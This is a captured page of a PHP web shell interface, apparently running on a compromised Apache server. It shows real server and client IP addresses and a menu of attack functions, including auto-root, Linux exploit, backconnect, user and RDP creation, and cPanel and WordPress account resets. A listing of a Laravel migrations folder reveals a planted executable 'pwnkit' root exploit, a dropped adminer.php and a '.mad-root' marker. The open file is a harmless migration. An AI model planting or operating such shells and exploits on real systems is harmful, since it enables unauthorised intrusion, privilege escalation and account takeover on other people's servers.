Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
database /
migrations /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
2018_05_19_095918_create_tipo_...
724
B
-rw-r--r--
2018_05_19_095938_create_local...
1.26
KB
-rw-r--r--
2018_05_19_100011_create_rol_t...
697
B
-rw-r--r--
2018_05_19_100103_create_usuar...
1.67
KB
-rw-r--r--
2018_06_04_193700_create_tipo_...
699
B
-rw-r--r--
2018_06_04_205751_create_prove...
1.11
KB
-rw-r--r--
2018_06_05_122855_create_tipo_...
661
B
-rw-r--r--
2018_06_05_122915_create_unida...
704
B
-rw-r--r--
2018_06_05_144006_create_produ...
1.88
KB
-rw-r--r--
2018_06_07_142211_create_compr...
1.68
KB
-rw-r--r--
2018_06_10_160517_create_detal...
1.31
KB
-rw-r--r--
2018_06_10_164208_create_produ...
1.25
KB
-rw-r--r--
2018_06_12_170312_create_clien...
1.16
KB
-rw-r--r--
2018_06_12_170320_create_tipo_...
740
B
-rw-r--r--
2018_06_12_170345_create_venta...
3.15
KB
-rw-r--r--
2018_06_12_171352_create_detal...
1.34
KB
-rw-r--r--
2018_06_25_084901_create_empre...
1.9
KB
-rw-r--r--
2018_07_11_123304_create_notas...
1.79
KB
-rw-r--r--
2018_07_14_183647_create_resum...
1.32
KB
-rw-r--r--
2018_07_14_184016_create_detal...
1.35
KB
-rw-r--r--
2018_07_22_133517_create_retir...
1.22
KB
-rw-r--r--
2018_07_22_174657_create_trasl...
1.17
KB
-rw-r--r--
2018_07_22_174854_create_detal...
1.01
KB
-rw-r--r--
2018_07_22_212307_create_egres...
1.37
KB
-rw-r--r--
2018_08_31_215100_create_profo...
1.59
KB
-rw-r--r--
2018_08_31_215128_create_detal...
1.24
KB
-rw-r--r--
2018_09_02_114349_create_guia_...
2.65
KB
-rw-r--r--
2018_11_17_094550_create_bajas...
1.89
KB
-rw-r--r--
2019_02_04_120222_create_detal...
1.18
KB
-rw-r--r--
2020_05_11_152356_create_deliv...
1.88
KB
-rw-r--r--
2020_05_11_152424_create_detal...
1.24
KB
-rw-r--r--
2021_11_03_195119_create_venta...
1.13
KB
-rw-r--r--
2021_12_08_095126_create_detal...
1.07
KB
-rw-r--r--
2024_01_03_114309_create_sujet...
764
B
-rw-r--r--
2024_01_03_114422_create_medio...
679
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2018_06_25_084901_create_empresa_table.php
<?php use Illuminate\Support\Facades\Schema; use Illuminate\Database\Schema\Blueprint; use Illuminate\Database\Migrations\Migration; class CreateEmpresaTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('empresa', function (Blueprint $table) { $table->integer('id_empresa')->autoIncrement(); $table->string('razon_social', 200); $table->string('ruc', 11); $table->string('representante', 100); $table->string('dni', 15); $table->string('autorizacion', 50); $table->string('direccion', 200); $table->string('telefono', 30)->nullable(); $table->string('pagina_web', 50)->nullable(); $table->string('email', 50)->nullable(); $table->string('ubigeo', 10)->nullable(); $table->decimal('valor_impuesto', 9, 2)->nullable(); $table->decimal('valor_icbper', 9, 2)->nullable(); $table->tinyInteger('modulo_puntos')->default('0'); $table->integer('id_sujeto_detraccion')->nullable(); $table->integer('id_medios_pago')->nullable(); $table->decimal('porcentaje_detraccion', 9, 2)->nullable(); $table->decimal('porcentaje_retencion', 9, 2)->nullable(); $table->string('cuenta_detraccion', 30)->nullable(); $table->string('numeros_cuenta', 500)->nullable(); $table->string('descripcion_empresa', 500)->nullable(); $table->string('campo1', 200)->nullable(); $table->string('campo2', 200)->nullable(); $table->tinyInteger('estado')->default('1'); $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::dropIfExists('empresa'); } }
Close